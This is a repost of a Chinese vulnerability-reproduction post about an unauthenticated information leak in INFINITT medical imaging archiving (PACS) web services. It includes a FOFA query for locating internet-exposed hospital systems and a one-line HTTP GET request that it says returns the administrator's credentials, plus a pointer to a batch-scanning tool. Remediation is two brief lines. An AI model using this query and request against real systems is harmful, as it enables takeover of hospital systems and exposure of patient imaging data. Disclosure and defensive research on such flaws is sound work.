英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC

admin 2024年11月21日11:15:58评论13 views字数 564阅读1分52秒阅读模式
英飞达医学影像存档与通信系统主要用于医院影像科室,负责将日常生成的各种医学影像(如核磁共振、CT、超声、X光、红外、显微镜等设备的图像)通过不同接口(如模拟信号、DICOM协议、网络传输)进行数字化保存。这些影像数据被海量存储,并能在授权下快速调取使用,同时提供一些辅助诊断和管理功能。该系统在不同影像设备之间传输数据和组织存储数据方面发挥着重要作用。
英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC
漏洞描述
英飞达医学影像存档与通信系统在/webservices/WebUserLogin.asmx/接口处存在信息泄露漏洞,攻击者无需身份验证即可利用该漏洞获取系统后台管理员的账户密码信息,进而登录后台,导致系统安全性严重受损。
fofa语法
"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
漏洞复现
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1Host: IP
英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC
英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC批量检测(批量检测POC工具请在公众号知识星球获取):
英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC
英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoC
修复建议
1、关闭互联网暴露面或接口设置访问权限
2、及时更新补丁或升级至安全版本

原文始发于微信公众号(白帽攻防):【漏洞复现】英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日11:15:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞 PoChttps://cn-sec.com/archives/3404499.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息